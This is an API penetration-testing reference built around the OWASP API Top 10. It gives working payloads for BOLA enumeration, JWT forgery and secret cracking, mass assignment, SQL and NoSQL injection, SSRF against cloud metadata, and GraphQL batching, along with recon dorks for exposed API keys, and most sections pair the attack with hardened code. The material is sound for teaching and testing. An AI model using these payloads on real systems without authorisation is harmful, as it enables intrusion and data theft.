API Penetration Testing - Technical Reference
🎯 Introduction
Application Programming Interfaces (APIs) have become the backbone of modern applications, enabling seamless communication and data exchange between different systems. However, their increasing prevalence has also made them a prime target for attackers. This comprehensive technical reference provides security professionals with detailed information about API penetration testing, covering vulnerabilities, tools, techniques, and automation methods.
APIs now represent the largest attack vector for modern applications. According to recent research, API attack traffic has surged by over 117% year-over-year, while the average number of APIs per organization has grown by 82%. Understanding API security vulnerabilities and testing methodologies is crucial for protecting modern applications.
🛡️ OWASP API Security Top 10 - 2023
The OWASP API Security Top 10 represents the most critical security risks facing APIs today. Understanding these vulnerabilities is fundamental to effective API penetration testing.
API1:2023 - Broken Object Level Authorization (BOLA)
```http
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123

# Attack: change the user ID while keeping user 123's token to read another user's profile
GET /api/v1/users/456/profile HTTP/1.1
Authorization: Bearer token_for_user_123
```
Testing Methodology:
- Identify every endpoint that takes an object identifier (path segment, query string, JSON body, header)
- Request those objects with a second user's token, covering sequential, random and UUID identifiers
- Repeat from each privilege level (anonymous, regular user, admin) and across the HTTP methods the endpoint accepts
- Enumerate identifiers to find resources that are reachable but not owned by the test account
- Check whether UUIDs are predictable (version 1 time-based, sequential, or derived from user data)
Mitigation:
- Enforce an authorization check on every object access, tied to the authenticated principal, not only on the endpoint
- Use random, unpredictable identifiers as defence in depth, never as a substitute for the check
- Validate the caller's permission before returning data, including in list and search endpoints
- Implement proper access control lists (ACLs) and test them with the same differential approach the attacker uses
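The differential test above can be driven by a short harness. The following is an added example written for this page (not OWASP code, not from any tool): two in-memory handlers stand in for the target API, one missing the ownership check and one enforcing it, and find_bola() runs every test account's token across the whole identifier space, reporting any 200 on an object the account does not own. The owners, tokens and handlers are constructed for the example; against a real target, fetch would be a function that performs the HTTP request and returns the status code.

```python
from typing import Callable, Dict, List, Set, Tuple

# Constructed fixture: which user owns which profile object, and the session tokens we hold.
OWNERS = {101: "alice", 102: "alice", 201: "bob", 301: "carol"}
TOKENS = {"token_alice": "alice", "token_bob": "bob"}  # carol is a victim we have no token for


def vulnerable_api(token: str, object_id: int) -> int:
    """Authenticates the caller but never checks object ownership (API1:2023)."""
    if token not in TOKENS:
        return 401
    return 200 if object_id in OWNERS else 404


def hardened_api(token: str, object_id: int) -> int:
    """Authorization check on every object access: owner gets 200, anyone else 403."""
    if token not in TOKENS:
        return 401
    owner = OWNERS.get(object_id)
    if owner is None:
        return 404
    return 200 if owner == TOKENS[token] else 403


def find_bola(fetch: Callable[[str, int], int],
              sessions: Dict[str, Set[int]],
              id_space: List[int]) -> List[Tuple[str, int]]:
    """Differential BOLA test.

    sessions maps each test account's token to the object IDs that account
    legitimately owns. Every token requests every ID in id_space; a 200 on an
    object the token does not own is a finding (token, object_id).
    """
    findings: List[Tuple[str, int]] = []
    for token, owned in sessions.items():
        for object_id in id_space:
            if fetch(token, object_id) == 200 and object_id not in owned:
                findings.append((token, object_id))
    return findings


if __name__ == "__main__":
    sessions = {"token_alice": {101, 102}, "token_bob": {201}}
    ids = list(range(100, 400))
    print("vulnerable:", find_bola(vulnerable_api, sessions, ids))
    print("hardened:  ", find_bola(hardened_api, sessions, ids))
```

Two accounts are the minimum; the value of the second one is that it turns "200 on some ID" into "200 on an ID I know belongs to someone else". Where the API answers 200 with an empty or redacted body, compare response bodies rather than only status codes, and for UUID-keyed objects the id_space comes from identifiers leaked elsewhere (list endpoints, shared links, other users' responses) rather than from enumeration.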
API2:2023 - Broken Authentication
Common Vulnerabilities:
- Weak password policies
- Missing account lockout mechanisms
- JWT token vulnerabilities
- OAuth misconfigurations
- API key exposure
- Session management flaws
```text
# JWT algorithm confusion: change RS256 to HS256 and sign with the server's
# RSA public key as the HMAC secret; a verifier that picks the algorithm from
# the header will validate the forged signature against that public key
# Original JWT header: {"alg":"RS256","typ":"JWT"}
# Modified:            {"alg":"HS256","typ":"JWT"}

# JWT "none" algorithm attack: set alg to "none" and leave the signature segment empty
{"alg":"none","typ":"JWT"}

# Weak HS256 secret brute force (hashcat mode 16500 = JWT); jwt.txt holds one token per line
hashcat -m 16500 jwt.txt wordlist.txt
```
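To make the "none" attack and the dictionary attack concrete, here is an added example written for this page using only the Python standard library (it is not code from hashcat or from any JWT library). SECRET, CLAIMS and the wordlist are constructed. decode_vulnerable() lets the token's own header choose the algorithm, which is the bug; decode_hardened() fixes the expected algorithm server-side and always verifies. The RS256-to-HS256 confusion is the same bug with the RSA public key used as the HMAC secret; it needs a key pair and is not reproduced here.

```python
import base64
import hashlib
import hmac
import json
from typing import List, Optional

# Constructed for this example: a weak signing secret and a benign claim set.
SECRET = b"s3cret"
CLAIMS = {"sub": "123", "role": "user"}


def b64url(data: bytes) -> str:
    """Base64url without padding, as RFC 7515 requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    """What the legitimate issuer does."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(claims)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_none(claims: dict) -> str:
    """Attacker's token: alg=none, arbitrary claims, empty signature segment."""
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(claims) + "."


def decode_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """The bug: the verifier trusts the alg named in the token header."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":  # signature is never checked
        return json.loads(b64url_decode(p))
    if alg == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def decode_hardened(token: str, secret: bytes) -> Optional[dict]:
    """The fix: the algorithm is pinned server-side and the signature is always verified."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, wordlist: List[str]) -> Optional[str]:
    """Offline dictionary attack on the HS256 secret (what hashcat -m 16500 automates)."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for word in wordlist:
        cand = hmac.new(word.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(cand, target):
            return word
    return None
```

Because decode_hardened() compares the header's alg against the one expected value, the spelling variants that have bypassed real libraries ("None", "NONE", "nOnE") are rejected without any special casing. The same pinning is what stops RS256-to-HS256 confusion: a verifier configured for RS256 must refuse an HS256 header rather than switch to HMAC.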
API3:2023 - Broken Object Property Level Authorization
```http
# Registration or profile-update request: the client adds properties it should never be able to set
Content-Type: application/json

{
  "username": "attacker",
  "email": "attacker@example.com",
  "isAdmin": true,
  "role": "administrator",
  "accountBalance": 999999
}
```
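The request above only works when the handler binds the whole body onto the stored record. The following is an added example written for this page (not code from any framework or from OWASP): update_profile_vulnerable() does exactly that, update_profile_hardened() applies an allow-list and refuses the request, and privileged_fields_changed() is the tester's check that compares the response against the record before the request. STORED_USER and CLIENT_WRITABLE are constructed; ATTACK_BODY is the body from the page.

```python
from typing import Any, Dict, Iterable, List

# Constructed stored record and allow-list for this example.
STORED_USER: Dict[str, Any] = {
    "id": 7, "username": "victim", "email": "victim@example.com",
    "isAdmin": False, "role": "user", "accountBalance": 10,
}
CLIENT_WRITABLE = {"username", "email"}

# The request body shown above, as a dict.
ATTACK_BODY: Dict[str, Any] = {
    "username": "attacker", "email": "attacker@example.com",
    "isAdmin": True, "role": "administrator", "accountBalance": 999999,
}


def update_profile_vulnerable(user: Dict[str, Any], body: Dict[str, Any]) -> Dict[str, Any]:
    """API3:2023 pattern: binds the whole JSON body onto the record, so every property is writable."""
    updated = dict(user)
    updated.update(body)
    return updated


def update_profile_hardened(user: Dict[str, Any], body: Dict[str, Any]) -> Dict[str, Any]:
    """Allow-list binding. Unknown or privileged properties are rejected with an error
    rather than silently dropped, so the client (and the tester) gets a 400, not a
    200 that leaves it unclear whether the property was honoured."""
    unexpected = set(body) - CLIENT_WRITABLE
    if unexpected:
        raise ValueError(f"properties not writable by the client: {sorted(unexpected)}")
    updated = dict(user)
    updated.update({k: body[k] for k in CLIENT_WRITABLE if k in body})
    return updated


def privileged_fields_changed(before: Dict[str, Any], after: Dict[str, Any],
                              writable: Iterable[str] = CLIENT_WRITABLE) -> List[str]:
    """Tester's check: which non-writable properties does the response show as changed?"""
    writable = set(writable)
    return sorted(k for k in after if k not in writable and after[k] != before.get(k))
```

The same allow-list belongs on the read side: serializing the whole record exposes properties such as accountBalance or internal flags to every caller, which is the other half of API3.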
API4:2023 - Unrestricted Resource Consumption
Missing limits on request rate, payload size, page size, or expensive operations (file uploads, SMS and e-mail sending, report generation) let a single client exhaust CPU, memory, storage or a paid third-party quota. Test by raising limit/page parameters, sending oversized bodies, and replaying costly calls in a loop.
API5:2023 - Broken Function Level Authorization
Privileged functions (for example DELETE on a user resource, or anything under an admin prefix) are reachable by changing the HTTP method or path because authorization is enforced per endpoint rather than per function and role. Test every discovered endpoint with each method and with a low-privilege token.
API6:2023 - Unrestricted Access to Sensitive Business Flows
A flow that is harmless once but damaging when automated (ticket purchase, referral rewards, account creation, coupon redemption) can be scripted at scale because the API does not detect or throttle non-human use.
API7:2023 - Server-Side Request Forgery (SSRF)
```http
# Body for an endpoint that fetches a user-supplied URL server-side; the target is the cloud instance metadata service
Content-Type: application/json

{
  "url": "http://169.254.169.254/latest/meta-data/"
}
```
API8:2023 - Security Misconfiguration
Missing hardening across the stack: permissive CORS, verbose errors and stack traces, unnecessary HTTP methods, unpatched components, missing security headers or TLS. Much of this is found directly from OPTIONS requests, error responses and the documentation endpoints listed later in this page.
API9:2023 - Improper Inventory Management
Undocumented, deprecated or non-production API versions (an old /api/v1 next to /api/v3, staging and debug hosts) stay exposed with weaker controls. Enumerating versions and hosts is therefore part of the attack surface, not just of recon.
API10:2023 - Unsafe Consumption of APIs
Data returned by third-party or upstream APIs is trusted more than user input: it is deserialized, stored or used in queries without validation, and their redirects are followed blindly. Treat upstream responses with the same validation as client input.
🛠️ API Penetration Testing Tools
Burp Suite - Web Application Security Testing Platform
Burp Suite is a comprehensive web application security testing platform that includes powerful features for API testing.
Key Features for API Testing:
- Proxy for intercepting and modifying API requests
- Scanner for automated vulnerability detection
- Repeater for manual testing
- Intruder for automated attacks
- Extensions for specialized API testing
Postman - API Development and Testing Platform
Postman is a popular API development and testing platform that includes security testing features.
Key Features for Security Testing:
- API request builder
- Collection runner for automated tests
- Environment variables for testing different configurations
- Pre-request scripts for dynamic testing
- Test scripts for validation
- Security testing features in Postman v10+
OWASP ZAP (Zed Attack Proxy)
OWASP ZAP is a free and open-source web application security scanner that can be used for API testing.
Key Features for API Testing:
- API scanning capabilities
- Fuzzing functionality
- Active and passive scanning
- Automation support
- API definition import (OpenAPI, SOAP)
Kiterunner - Contextual Content Discovery Tool
Repository: https://github.com/assetnote/kiterunner
Kiterunner is an advanced API discovery tool that goes beyond traditional content discovery by bruteforcing routes/endpoints in modern applications.
Key Features:
- Performs traditional content discovery at lightning fast speeds
- Bruteforces routes/endpoints in modern application frameworks (Flask, Rails, Express, Django)
- Uses dataset of Swagger specifications to send correct HTTP methods, headers, paths, parameters and values
- Supports depth scanning for nested API endpoints
- Wildcard detection and quarantine threshold to avoid false positives
```bash
# Scan a host list with the packaged Assetnote route dataset (20000 routes), 5 parallel hosts, 100 concurrent requests
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 \
    --fail-status-codes 400,401,404,403,501,502,426,411

# Scan with a custom wordlist
kr scan target.com -w routes.kite -x 20 -j 1

# Bruteforce with extensions
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 \
    -exml,asp,aspx,ashx -D
```
ffuf (Fuzz Faster U Fool)
Repository: https://github.com/ffuf/ffuf
Fast web fuzzer written in Go for API and web application security testing.
```bash
# Endpoint discovery with an authenticated session
ffuf -w api-endpoints.txt -u https://api.target.com/FUZZ \
    -H "Authorization: Bearer TOKEN"

# Parameter fuzzing
ffuf -w params.txt -u https://target.com/api?FUZZ=value

# POST data fuzzing
ffuf -w wordlist.txt -X POST -d "param=FUZZ" -u https://target.com/api
```
Arjun - HTTP Parameter Discovery Suite
Repository: https://github.com/s0md3v/Arjun
Python tool for discovering hidden HTTP parameters in web applications and APIs.
```bash
# Single URL
arjun -u https://api.target.com/endpoint

# Multiple URLs from file
arjun -i urls.txt

# JSON output
arjun -u https://target.com/api -oJ output.json
```
GraphQL Tools
| Tool | Description | Repository |
|---|---|---|
| GraphQLmap | Scripting engine to interact with GraphQL endpoint for pentesting | GitHub |
| InQL | Burp Extension for GraphQL Security Testing | GitHub |
| BatchQL | GraphQL security auditing script with focus on batch queries | GitHub |
| clairvoyance | Obtain GraphQL API schema despite disabled introspection | GitHub |
📝 Wordlists and Fuzzing Resources
SecLists
Repository: https://github.com/danielmiessler/SecLists
SecLists is a collection of multiple types of lists used during security assessments, including wordlists for API testing.
Relevant Wordlists:
- Discovery/Web-Content/api/ - API-specific wordlists
- Discovery/Web-Content/common.txt - Common paths
- Fuzzing/ - Fuzzing payloads
- Passwords/ - Password lists for authentication testing
Assetnote Wordlists
Website: https://wordlists.assetnote.io/
Assetnote provides comprehensive wordlists specifically designed for API and web application security testing.
Common API Endpoints
```text
/api/v2/
/api/v3/
/rest/
/graphql
/swagger.json
/openapi.json
/api-docs
/docs
/api/docs
/api/swagger
/api/openapi
```
🔍 External Reconnaissance Platforms
Shodan - The Search Engine for Internet-Connected Devices
Website: https://www.shodan.io/
Shodan is a search engine that crawls the internet and indexes information about connected devices, services, and APIs.
Common Shodan Filters for API Discovery:
| Filter | Description | Example |
|---|---|---|
| http.component | Search for specific web components | http.component:"swagger" |
| http.title | Search by page title | http.title:"API" |
| port | Filter by specific ports | port:80,443,8080 |
| ssl | Search SSL certificates | ssl:"api.example.com" |
| org | Filter by organization | org:"Example Corp" |
Shodan Dorks for API Discovery:
```text
# Find JSON-speaking services
"content-type: application/json"
"api" port:80,443,8080,8443

# Find Swagger/OpenAPI documentation
"swagger" "API"
"/api/v1" "swagger.json"
"/api-docs"

# Find GraphQL endpoints
"graphql" port:80,443
"Content-Type: application/graphql"

# Find exposed API keys
"api_key" "Authorization: Bearer"
```
Censys - Internet Intelligence Platform
Website: https://search.censys.io/
Censys provides comprehensive internet-wide scanning and asset discovery, particularly useful for finding exposed APIs and services.
```text
# Find HTTP services whose response body mentions "api"
services.service_name: "HTTP" and services.http.response.body: "api"

# Find Swagger documentation
services.http.response.body: "swagger"

# Find GraphQL endpoints
services.http.response.body: "graphql"
```
ZoomEye - Cyberspace Search Engine
Website: https://www.zoomeye.ai/
ZoomEye is a cyberspace search engine that provides device and service discovery capabilities.
Google Dorking for APIs
```text
# Find API documentation
site:example.com inurl:api/docs
site:example.com "api documentation"
site:example.com swagger.json

# Find exposed API keys
site:example.com "api_key"
site:example.com "apikey"

# Find GraphQL
site:example.com inurl:graphql
site:example.com "graphql playground"
```
⚔️ Common Attack Techniques
1. Broken Object Level Authorization (BOLA/IDOR)
```http
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123

# Attack: enumerate all users with the same token
GET /api/v1/users/1/profile
GET /api/v1/users/2/profile
GET /api/v1/users/3/profile
```
2. SQL Injection
```http
# Payloads shown decoded for readability; on the wire quotes, spaces and comment
# sequences are URL-encoded (e.g. ' becomes %27, a space becomes %20)

# Boolean-based: tautology in a string context
GET /api/v1/users?id=1' OR '1'='1 HTTP/1.1

# Union-based SQL Injection
GET /api/v1/products?id=1 UNION SELECT username,password FROM users-- HTTP/1.1

# Time-based Blind SQL Injection (SLEEP is MySQL; use pg_sleep() / WAITFOR DELAY on PostgreSQL / MSSQL)
GET /api/v1/search?q=test' AND SLEEP(5)-- HTTP/1.1
```
3. NoSQL Injection
```http
# Authentication bypass: both fields become "not equal to null", which matches every document
POST /api/v1/login HTTP/1.1
Content-Type: application/json

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

# MongoDB operator injection through the query string (bracket syntax parsed into an object)
GET /api/v1/users?age[$gt]=0 HTTP/1.1
```
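To show why the two requests above work and what the fix looks like, here is an added example written for this page (not code from MongoDB, pymongo or any framework). A toy matcher that understands equality, $ne and $gt stands in for the database; login_vulnerable() passes the parsed JSON straight into the query, login_hardened() admits only strings, and parse_bracket_qs() mimics the qs-style parsing (the Express default) that turns username[$ne]=x into a nested object. USERS is a constructed collection.

```python
import re
from typing import Any, Dict, List, Optional
from urllib.parse import parse_qsl

# Constructed user collection standing in for a MongoDB collection.
USERS: List[Dict[str, Any]] = [
    {"username": "admin", "password": "hunter2", "age": 41},
    {"username": "alice", "password": "pa55", "age": 29},
]


def matches(doc: Dict[str, Any], query: Dict[str, Any]) -> bool:
    """Toy MongoDB matcher: equality plus the $ne and $gt operators.

    As in MongoDB, $gt only matches values of the same type as its argument.
    """
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):  # an operator object reached the query
            for op, arg in cond.items():
                if op == "$ne":
                    if value == arg:
                        return False
                elif op == "$gt":
                    if not (isinstance(value, type(arg)) and value > arg):
                        return False
                else:
                    raise ValueError(f"unsupported operator {op}")
        elif value != cond:
            return False
    return True


def find_one(query: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    return next((d for d in USERS if matches(d, query)), None)


def login_vulnerable(body: Dict[str, Any]) -> Optional[str]:
    """Parsed JSON flows straight into the query, so {"$ne": null} is honoured as an operator."""
    hit = find_one({"username": body.get("username"), "password": body.get("password")})
    return hit["username"] if hit else None


def login_hardened(body: Dict[str, Any]) -> Optional[str]:
    """Only scalar strings reach the query; any object (hence any operator) is rejected (HTTP 400)."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    hit = find_one({"username": username, "password": password})
    return hit["username"] if hit else None


def parse_bracket_qs(qs: str) -> Dict[str, Any]:
    """Mimic qs-style query-string parsing, where username[$ne]=x becomes
    {'username': {'$ne': 'x'}}: the same operator injection arrives through
    the query string instead of a JSON body."""
    out: Dict[str, Any] = {}
    for key, val in parse_qsl(qs, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\]]+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = val
        else:
            out[key] = val
    return out
```

Type checking at the boundary is the durable fix; stripping keys that start with "$" (what express-mongo-sanitize does) also works but must be applied to every input path, including the query string and nested objects. Note that the query-string variant carries strings, so age[$gt]=0 only matches if the stored field is a string or the application coerces it; username[$ne]= against string fields works as is.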
4. Server-Side Request Forgery (SSRF)
```http
POST /api/v1/fetch HTTP/1.1
Content-Type: application/json

{
  "url": "http://169.254.169.254/latest/meta-data/"
}

# SSRF to internal services (here: Redis on the loopback interface)
{
  "url": "http://localhost:6379/"
}
```
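Both this section and API7:2023 above show the same request; what the defender needs is a validator for the url parameter, and what the tester needs is a list of the spellings it must reject. The following is an added example written for this page (not from OWASP, not from any HTTP client library): validate_fetch_target() refuses non-http(s) schemes, credentials in the authority, literal or resolved addresses in loopback, private, link-local and other non-public ranges, and IPv4-mapped IPv6 forms of the same. FAKE_DNS is a constructed resolver stub so the example runs offline; the public addresses in it are placeholders.

```python
import ipaddress
from typing import Callable, List
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline. A real implementation
# calls socket.getaddrinfo() and then connects to the vetted address itself,
# so a second lookup cannot return something different (DNS rebinding).
FAKE_DNS = {
    "api.partner.example": ["8.8.8.8"],
    "localhost": ["127.0.0.1"],
    "internal-wiki.corp": ["10.0.0.5"],
    "rebind.attacker.example": ["1.1.1.1", "169.254.169.254"],
}


def resolve_stub(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])


def is_blocked_address(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local (cloud metadata) and any other non-global range."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata service
    return (not addr.is_global or addr.is_private or addr.is_loopback
            or addr.is_link_local or addr.is_multicast or addr.is_reserved
            or addr.is_unspecified)


def validate_fetch_target(url: str,
                          resolve: Callable[[str], List[str]] = resolve_stub) -> str:
    """Return the URL if it is safe to fetch server-side, otherwise raise ValueError.

    Hosts that are neither a parseable IP literal nor resolvable are rejected;
    this also covers decimal or hex spellings such as http://2130706433/, which
    ipaddress does not accept (getaddrinfo would resolve them to 127.0.0.1,
    which the range check then blocks).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        candidates = [str(ipaddress.ip_address(host))]
    except ValueError:
        candidates = resolve(host)
        if not candidates:
            raise ValueError(f"unresolvable host: {host}")
    blocked = [ip for ip in candidates if is_blocked_address(ip)]
    if blocked:
        raise ValueError(f"target resolves to blocked address(es): {blocked}")
    return url
```

Every address a name resolves to is checked, so a rebinding host that returns one public and one link-local answer is rejected outright. The two remaining gaps a validator alone cannot close are redirects (the fetcher must re-validate each hop or not follow them) and time-of-check/time-of-use on DNS, which is why the connection should be made to the vetted IP with the Host header set separately.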
5. GraphQL Specific Attacks
```graphql
# Introspection query: dump the schema. If introspection is disabled, clairvoyance
# (listed above) reconstructs it from field-suggestion error messages instead.
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      ...FullType
    }
  }
}

# Minimal FullType fragment; the full version shipped with graphql-js also
# covers enums, interfaces, input fields and directives
fragment FullType on __Type {
  kind
  name
  fields {
    name
    args { name type { name kind } }
    type { name kind ofType { name kind } }
  }
}

# Alias batching: many object reads in one request, which sidesteps per-request
# rate limits and turns a BOLA into a bulk dump
query {
  user1: user(id: 1) { email }
  user2: user(id: 2) { email }
  user3: user(id: 3) { email }
  # ... repeat 1000 times
}
```
🤖 Automation Scripts and Techniques
Python API Testing Script
```python
import requests


def test_api_endpoint(base_url, endpoint, token):
    """Probe sequential object IDs with one user's token (BOLA/IDOR check).

    A 200 for an object that does not belong to the token's owner is a
    finding; 403 (or 404) means the authorization check held or the object
    does not exist.
    """
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    # Test for BOLA
    for user_id in range(1, 100):
        url = f"{base_url}{endpoint}/{user_id}"
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Accessible: {url}")
        elif response.status_code == 403:
            print(f"[-] Forbidden: {url}")
```
Automated API Security Testing Script
```bash
#!/usr/bin/env bash
set -euo pipefail

API_URL="https://api.example.com"
OUTPUT_DIR="./api_test_results"
mkdir -p "$OUTPUT_DIR"

# 1. Enumerate endpoints with Kiterunner
#    (-o selects the output format, so the results go to a file via redirection)
kr scan "$API_URL" -w routes.kite -x 20 -j 100 \
    --fail-status-codes 400,401,404,403 \
    -o json > "$OUTPUT_DIR/kiterunner_results.json"

# 2. Fuzz with ffuf (JSON output is the default format for -o)
ffuf -w /usr/share/wordlists/api-endpoints.txt \
    -u "$API_URL/FUZZ" \
    -mc 200,201,301,302,401,403 \
    -o "$OUTPUT_DIR/ffuf_results.json"

# 3. Parameter discovery with Arjun
arjun -u "$API_URL/api/endpoint" \
    -oJ "$OUTPUT_DIR/arjun_results.json"
```
🎓 Practice Environments
Deliberately vulnerable APIs for learning and practicing API penetration testing:
| Name | Author | Description |
|---|---|---|
| crAPI | OWASP | Completely ridiculous API for learning |
| Damn Vulnerable GraphQL Application | dolevf | Intentionally vulnerable GraphQL implementation |
| VAmPI | erev0s | Vulnerable REST API with OWASP top 10 vulnerabilities |
| vAPI | roottusk | Self-hostable API mimicking OWASP API Top 10 scenarios |
| Pixi | DevSlop | MEAN Stack web app with insecure APIs |
📚 References
- OWASP Foundation. (2023). OWASP API Security Top 10 2023. https://owasp.org/API-Security/editions/2023/en/0x11-t10/
- OWASP Foundation. (2024). Web Security Testing Guide. https://owasp.org/www-project-web-security-testing-guide/
- Assetnote. (2021). Kiterunner - Contextual Content Discovery Tool. https://github.com/assetnote/kiterunner
- arainho. Awesome API Security. https://github.com/arainho/awesome-api-security
- Shodan. Shodan Search Engine. https://www.shodan.io/
- Censys. Censys Internet Intelligence Platform. https://search.censys.io/